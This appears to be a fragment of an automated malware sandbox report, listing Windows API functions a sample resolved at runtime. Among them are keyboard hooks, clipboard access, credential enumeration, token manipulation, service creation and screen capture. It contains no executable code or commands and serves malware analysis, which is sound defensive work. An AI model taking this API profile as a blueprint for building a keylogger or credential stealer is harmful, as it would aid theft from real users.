| Get Address | c:\windows\syswow64\kernel32.dll | function = MoveFileExW, address_out = 0x765bb2b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileW, address_out = 0x765c6ec0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x765b7970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x765b3690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEnvironmentVariableA, address_out = 0x765e22f0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemInfo, address_out = 0x765ba0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x765c0160 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x765ba8a0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileTime, address_out = 0x765c6a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTime, address_out = 0x765c4940 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SystemTimeToFileTime, address_out = 0x765c4c10 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileSize, address_out = 0x765c6a70 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x765c68c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindClose, address_out = 0x765c68e0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x765c6c00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointer, address_out = 0x765c6c40 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileTime, address_out = 0x765c6c60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualProtect, address_out = 0x765b7a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x765b38c0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x765bcd50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x765c5100 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForMultipleObjects, address_out = 0x765c6800 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteAtom, address_out = 0x765bcb20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenA, address_out = 0x765b8c80 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x765c6820 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x779c7a80 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleA, address_out = 0x765b99f0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalAddAtomW, address_out = 0x765b1be0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x765b8bf0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ProcessIdToSessionId, address_out = 0x765b8fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x765b7990 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x765b3870 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryA, address_out = 0x765c4bf0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x765c6630 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x765b9b90 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x765b78b0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindAtomW, address_out = 0x765b20f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x765b23e0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x765b7710 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x765bb000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x765b9bc0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibrary, address_out = 0x765b9f50 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetExitCodeProcess, address_out = 0x765bfdb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x765b9fd0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringA, address_out = 0x765bfde0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyA, address_out = 0x765bea30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x765c7b30 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetProcessPriorityBoost, address_out = 0x765bfef0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetPriorityClass, address_out = 0x765b9e90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x765b9b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadPriority, address_out = 0x765b9990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentVariableW, address_out = 0x765b9970 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThread, address_out = 0x765b75f0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcatW, address_out = 0x765dd170 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalAlloc, address_out = 0x765b9950 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GlobalFree, address_out = 0x765bccf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x765b79a0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyW, address_out = 0x765dd260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x765bcc30 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x765c6bb0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEnvironmentVariableW, address_out = 0x765be9e0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTempPathW, address_out = 0x765c6b30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x765c6890 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTempFileNameW, address_out = 0x765c6b10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x765b7a30 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x7798efe0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualFree, address_out = 0x765b7600 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualAlloc, address_out = 0x765b7810 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RemoveDirectoryW, address_out = 0x765c6bf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x765c6ca0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x765c6640 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DisconnectNamedPipe, address_out = 0x765e0990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x765c69b0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x765baaf0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x765c66b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetComputerNameW, address_out = 0x765c46a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x765b3880 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetComputerNameA, address_out = 0x765bfbf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetShortPathNameW, address_out = 0x765b2b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindFirstFileW, address_out = 0x765c6960 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindNextFileW, address_out = 0x765c69a0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfW, address_out = 0x7783f890 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfA, address_out = 0x778404a0 |
|
2 | |
| Get Address | c:\windows\syswow64\user32.dll | function = ExitWindowsEx, address_out = 0x77879430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetShellWindow, address_out = 0x7782ff50 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetForegroundWindow, address_out = 0x77848cb0 |
|
3 | |
| Get Address | c:\windows\syswow64\user32.dll | function = TranslateMessage, address_out = 0x7782d9b0 |
|
2 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetWindowThreadProcessId, address_out = 0x7782da50 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetUserNameA, address_out = 0x74ac2910 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x74abf590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = DuplicateTokenEx, address_out = 0x74ac0ad0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetLengthSid, address_out = 0x74abf570 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CreateProcessAsUserW, address_out = 0x74ac2c10 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = FreeSid, address_out = 0x74ac0440 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x74abf520 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExA, address_out = 0x74ac0a20 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AllocateAndInitializeSid, address_out = 0x74abf660 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetTokenInformation, address_out = 0x74ac3840 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyA, address_out = 0x74ac09d0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x74abf620 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = ConvertSidToStringSidW, address_out = 0x74abf060 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueA, address_out = 0x74ad4dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x74ac0980 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x74abf330 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteValueW, address_out = 0x74ac0fb0 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x74abf350 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = InitializeAcl, address_out = 0x74abfa80 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = InitializeSecurityDescriptor, address_out = 0x74abfc00 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AddAce, address_out = 0x74ac1ee0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x74abf7f0 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetKeySecurity, address_out = 0x74ad7830 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyExW, address_out = 0x74abfa20 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetAce, address_out = 0x74ac2550 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetAclInformation, address_out = 0x74ac2570 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegGetKeySecurity, address_out = 0x74ac4190 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetSecurityDescriptorDacl, address_out = 0x74abfc50 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetSecurityDescriptorDacl, address_out = 0x74abf830 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExA, address_out = 0x74abf790 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CheckTokenMembership, address_out = 0x74abfb50 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CreateWellKnownSid, address_out = 0x74ac0af0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetSidSubAuthority, address_out = 0x74ac0ab0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetSidSubAuthorityCount, address_out = 0x74ac0eb0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExA, address_out = 0x74abf500 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = ConvertStringSecurityDescriptorToSecurityDescriptorA, address_out = 0x74ac3ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetEntriesInAclW, address_out = 0x74ac2bf0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetFileSecurityW, address_out = 0x74ac41d0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x74abfaa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetUserNameW, address_out = 0x74ac1030 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = StartServiceW, address_out = 0x74ac4210 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenSCManagerW, address_out = 0x74ac0ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CloseServiceHandle, address_out = 0x74ac0960 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CreateServiceW, address_out = 0x74ad65d0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetServiceStatus, address_out = 0x74ac0fd0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegisterServiceCtrlHandlerW, address_out = 0x74ac12f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = StartServiceCtrlDispatcherW, address_out = 0x74ac12b0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyA, address_out = 0x74ac2500 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x74abf370 |
|
2 | |
| Get Address | c:\windows\syswow64\secur32.dll | function = GetUserNameExW, address_out = 0x7469c5f0 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = ShellExecuteExW, address_out = 0x752be690 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = 680, address_out = 0x753cdb90 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = SHChangeNotify, address_out = 0x7527cd10 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoTaskMemFree, address_out = 0x748d9170 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoCreateInstance, address_out = 0x74900060 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoInitialize, address_out = 0x77201930 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoUninitialize, address_out = 0x748d92a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoInitializeEx, address_out = 0x748d88d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetErrorMode, address_out = 0x765b8d20 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = CommandLineToArgvW, address_out = 0x752cbf80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualQuery, address_out = 0x765b7a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetNativeSystemInfo, address_out = 0x765bac70 |
|
2 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = ZwOpenProcess, address_out = 0x779d6f00 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = ZwOpenProcessToken, address_out = 0x779d7e10 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = ZwQueryInformationToken, address_out = 0x779d6eb0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = RtlComputeCrc32, address_out = 0x77a2d9b0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = RtlDecompressBuffer, address_out = 0x779d6b80 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyExA, address_out = 0x74abfa60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptExportKey, address_out = 0x74abfb30 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptAcquireContextW, address_out = 0x74ac0590 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptSetProvParam, address_out = 0x74ad6c90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptReleaseContext, address_out = 0x74ac0650 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptGenRandom, address_out = 0x74ac10a0 |
|
2 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x74abcbe0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptGenKey, address_out = 0x74ac3910 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptDestroyKey, address_out = 0x74ac0400 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptGetUserKey, address_out = 0x74ad6c30 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = IsValidSecurityDescriptor, address_out = 0x74ad7070 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x74abe430 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetSecurityDescriptorSacl, address_out = 0x74ac2a20 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryInfoKeyW, address_out = 0x74abf640 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x74ac04f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenCurrentUser, address_out = 0x74ac1080 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegEnumValueW, address_out = 0x74abf680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegEnumKeyExW, address_out = 0x74abf470 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptGetHashParam, address_out = 0x74abf7d0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CredFree, address_out = 0x74ac3930 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegEnumKeyExA, address_out = 0x74ac1810 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptAcquireContextA, address_out = 0x74ac0630 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptCreateHash, address_out = 0x74abfa00 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegEnumValueA, address_out = 0x74ac1e70 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CredEnumerateA, address_out = 0x74ad6670 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptDestroyHash, address_out = 0x74ac02a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptHashData, address_out = 0x74abfb10 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = DeregisterEventSource, address_out = 0x74ab8570 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegisterEventSourceA, address_out = 0x74ac1570 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetSecurityInfo, address_out = 0x74ac05f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetSecurityInfo, address_out = 0x74abfbe0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SetEntriesInAclA, address_out = 0x74ac3cc0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = ReportEventA, address_out = 0x74ad37a0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DispatchMessageW, address_out = 0x778262e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x7782abd0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = ToUnicodeEx, address_out = 0x77892420 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = CallNextHookEx, address_out = 0x77823550 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetKeyState, address_out = 0x7782ddd0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetMessageW, address_out = 0x77844f60 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = CloseClipboard, address_out = 0x778495c0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = MapVirtualKeyA, address_out = 0x77843e20 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DrawIcon, address_out = 0x7783f6e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetIconInfo, address_out = 0x77840160 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DefWindowProcW, address_out = 0x779eaee0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetClipboardViewer, address_out = 0x77849a80 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x77825d90 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = UnhookWindowsHookEx, address_out = 0x77848fe0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = OpenClipboard, address_out = 0x77843920 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowsHookExW, address_out = 0x7782fb10 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = CreateWindowExW, address_out = 0x77829860 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetWindowTextW, address_out = 0x7783cb20 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetClipboardData, address_out = 0x77842bf0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetProcessWindowStation, address_out = 0x77848b10 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = MessageBoxA, address_out = 0x7788fec0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetUserObjectInformationW, address_out = 0x77848fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetMessageA, address_out = 0x7783e130 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = MapVirtualKeyW, address_out = 0x77843c80 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DispatchMessageA, address_out = 0x77846f10 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = IsCharAlphaNumericW, address_out = 0x7789ac00 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetCursorPos, address_out = 0x7783f6c0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = CharLowerW, address_out = 0x7789ab20 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetKeyboardState, address_out = 0x77849060 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = RegisterClassExW, address_out = 0x77829580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetKeyboardLayout, address_out = 0x7782ef20 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetAsyncKeyState, address_out = 0x7782e820 |
|
1 | |
| Get Address | c:\windows\syswow64\psapi.dll | function = GetModuleFileNameExW, address_out = 0x772c13e0 |
|
1 | |
| Get Address | c:\windows\syswow64\psapi.dll | function = GetProcessMemoryInfo, address_out = 0x772c16c0 |
|
1 | |
| Get Address | c:\windows\syswow64\psapi.dll | function = GetModuleFileNameExA, address_out = 0x772c1660 |
|
1 | |
| Get Address | c:\windows\syswow64\psapi.dll | function = EnumProcessModules, address_out = 0x772c1360 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSAEnumProtocolsW, address_out = 0x746d7ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 22, address_out = 0x746d4970 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSAIoctl, address_out = 0x746d2f70 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 5, address_out = 0x746d48b0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 4, address_out = 0x746d6090 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 8, address_out = 0x746c4ab0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 9, address_out = 0x746c4a90 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 13, address_out = 0x746d5f50 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 16, address_out = 0x746d1d20 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 21, address_out = 0x746cecc0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 112, address_out = 0x746c5a10 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 7, address_out = 0x746d3e40 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSASocketW, address_out = 0x746ce7d0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSASendTo, address_out = 0x746d7f90 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 6, address_out = 0x746d3830 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSARecvFrom, address_out = 0x746d8090 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSARecv, address_out = 0x746d2c50 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 10, address_out = 0x746ce180 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 18, address_out = 0x746d1f00 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = GetNameInfoW, address_out = 0x746d4050 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = GetAddrInfoW, address_out = 0x746d2180 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = FreeAddrInfoW, address_out = 0x746d5ee0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSADuplicateSocketW, address_out = 0x746efca0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSASend, address_out = 0x746d2de0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 14, address_out = 0x746c4ab0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 151, address_out = 0x746c47e0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 17, address_out = 0x746d7370 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = WSCGetProviderPath, address_out = 0x746fde80 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 57, address_out = 0x746f12a0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 111, address_out = 0x746c4f60 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 12, address_out = 0x746d59f0 |
|
1 | |
| Get Address | c:\windows\syswow64\ws2_32.dll | function = 19, address_out = 0x746d1b90 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = BitBlt, address_out = 0x76f82230 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x76f80fe0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = CreateDCW, address_out = 0x76fb2ab0 |
|
1 | |
